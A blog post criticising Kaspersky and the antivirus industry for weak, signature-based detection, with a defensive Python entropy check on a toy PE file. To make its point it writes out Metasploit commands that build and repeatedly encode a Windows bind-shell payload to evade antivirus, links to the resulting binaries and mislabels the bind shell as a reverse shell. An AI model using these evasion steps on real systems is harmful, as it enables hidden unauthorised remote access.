AV evasion and about rankings


Some AV Vendors Lack Efficiency

Once upon a time we were living in a world where creating protective technology, still called Anti-Virus, was a good thing to do. These days vendors seem to be too relaxed with the idea of selling a pig in a poke.
(Source: Roel Schouwenberg's rant ;) - yes, I reversed his message.)

Obscure security software closes Polypack?

The Kaspersky "researcher" doesn't seem to like the Polypack project, which simply demonstrated that Kaspersky's engine in particular fails to detect packed (or encoded) malicious software, because it is just signature-dependent cheap-ware.
In my comparisons Kaspersky was among the worst engines on the market, which simply led to the decision to buy another one.
As long as we lack competitive results, other people won't be able to test AV software according to their needs. Polypack is now restricted, so the majority of people will not be able to draw these conclusions.
Surely this is provoked, because scanning a piece of software at VirusTotal reveals a similar truth once you pack and encode your binaries. In the following, let's go through a short demonstration with msfencode:

    wishi@somepc ~/pentest/exploits/framework3
    % ./msfpayload windows/shell_bind_tcp LPORT=6666 X > evil_malware.exe
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/shell_bind_tcp
     Length: 341
    Options: LPORT=6666
    wishi@somepc ~/pentest/exploits/framework3
    % msfencode x86/shikata_ga_nai -c 23 -i evil_malware.exe -t exe > payload_getme.exe
    [*] x86/shikata_ga_nai succeeded, final size 4701

For everybody who is unfamiliar with Metasploit:
msfpayload generates a "netcat binary" that opens a reverse shell on the target system at port 6666, which an attacker can connect to.
msfencode encodes the binary 23 times with shikata ga nai, which is simply a polymorphic XOR additive feedback encoder working against a four byte key.

Now let's upload the payload_getme.exe to VirusTotal and check whether Kaspersky gets it:

A realistic test-case: a one minute malware

The binary:
download of the encoded binary
download of the unencoded binary

The details are:

    File size: 7897 bytes
    MD5...: ac31e944dadbd19cad6a9c6392f9cbb2
    SHA1..: 199ca40325f00c241cc4f4a3f250ce2f19928c50
    SHA256: 0df5ee634299d10f61b0b47ae98a65d6031a7a20f1603f9d6c7f2cdee326dd98
    ssdeep: 192:F+EhmnIPq5275rtUtMtk8sD/UYxBXayPbW5tlny5:ZzP6275roMtc9zFPa57nM
    PEiD..: -
    TrID..: File type identification
            Win32 Executable Generic (58.2%)
            Win16/32 Executable Delphi generic (14.1%)
            Generic Win/DOS Executable (13.6%)
            DOS Executable Generic (13.6%)
            VXD Driver (0.2%)
    PEInfo: PE Structure information

    ( base data )
    entrypointaddress.: 0x1000
    timedatestamp.....: 0xa06f53f9L (invalid)
    machinetype.......: 0x14c (I386)

    ( 3 sections )
    name   viradd virsiz rawdsiz ntrpy md5
    .text  0x1000 0x28   0x200   0.35  069035f6a494e732c83dd2b3b4fa5a89
    .data  0x2000 0xa90  0xc00   7.94  76e83aec75a56c0a2aeb4ccfb8895cc8
    .idata 0x3000 0x64   0x200   7.61  89ec0a7836ffb1f3502f0b4f0017f5ab

    ( 0 imports )

    ( 0 exports )
    PDFiD.: -
    RDS...: NSRL Reference Data Set
            -
    packers (Kaspersky): PE_Patch

That's really dangerous

The AntiVirus industry not only tries to establish a false sense of security among its users, it also suppresses research. Instead of going after academics who demonstrate the mistakes this industry makes, they should get up and create something effective against "Malware". Now.
And instead of creating stupid signature-dependent cheap-ware, there is something to learn from heuristics or behavior analysis.
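The section table in the VirusTotal details above already carries the tell-tale of an encoded payload: a near-empty .text and a .data section with entropy 7.94, close to the 8.0 maximum, with zero imports. The following Python is an added example, not code from the original post: it walks the PE section table and flags sections whose Shannon entropy exceeds a threshold (7.0 is an assumed cut-off), run on a constructed toy PE that imitates the layout above rather than on the real sample.

```python
import hashlib
import math
import struct

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 0 for padding, near 8 for encoded or compressed data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(b) for b in set(data)))

def pe_sections(image: bytes):
    """Yield (name, raw bytes) for each entry of the PE section table (minimal parser)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section headers follow the optional header
    for i in range(nsec):
        name, _vs, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii"), image[raw_ptr:raw_ptr + raw_size]

def suspicious_sections(image: bytes, threshold: float = 7.0):
    """[(name, entropy)] for sections above the threshold, the packed/encoded tell-tale."""
    scored = [(n, round(shannon_entropy(d), 2)) for n, d in pe_sections(image)]
    return [(n, h) for n, h in scored if h > threshold]

def build_sample_pe(sections):
    """Constructed toy PE (DOS stub, COFF header, section table, raw data), not a real binary."""
    nsec = len(sections)
    data_off = 0x40 + 24 + 40 * nsec
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, 0, 0x102)
    table, blob = b"", b""
    for i, (name, data) in enumerate(sections):
        table += struct.pack("<8sIIII", name.encode(), len(data), 0x1000 * (i + 1),
                             len(data), data_off + len(blob)) + b"\0" * 16
        blob += data
    return dos + coff + table + blob

# Constructed sample: a tiny .text stub plus a .data section of pseudo-random bytes.
SAMPLE_PE = build_sample_pe([
    (".text", b"\x90" * 0x1F0 + b"\xC3" * 0x10),
    (".data", b"".join(hashlib.sha256(bytes([i])).digest() for i in range(96))),
])

if __name__ == "__main__":
    for name, h in suspicious_sections(SAMPLE_PE):
        print(f"{name}: entropy {h} looks packed or encoded")
```

High entropy alone is not proof of malice (legitimately compressed resources score the same), which is why such a score belongs in a heuristic pipeline next to import and behaviour checks rather than as a standalone verdict.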

However, one might assume that marketing people do not want competitive analysis, simply because as long as people are afraid, they buy.
Instead of celebrating multi-million dollar parties and employing clueless people, Kaspersky especially should redefine what they are: a security company or a mafia.

Have fun,
wishi

Circumventing this print lock is prohibited under § 95a UrhG!
Person responsible for content according to § 10 paragraph 3 MDStV: Marius Ciepluch - address via eMail. The eMail address can be found in the imprint of this English-language site.
For data protection reasons I conduct neither official nor governmental correspondence via eMail. The postal address deposited with the hosting provider is to be used for that.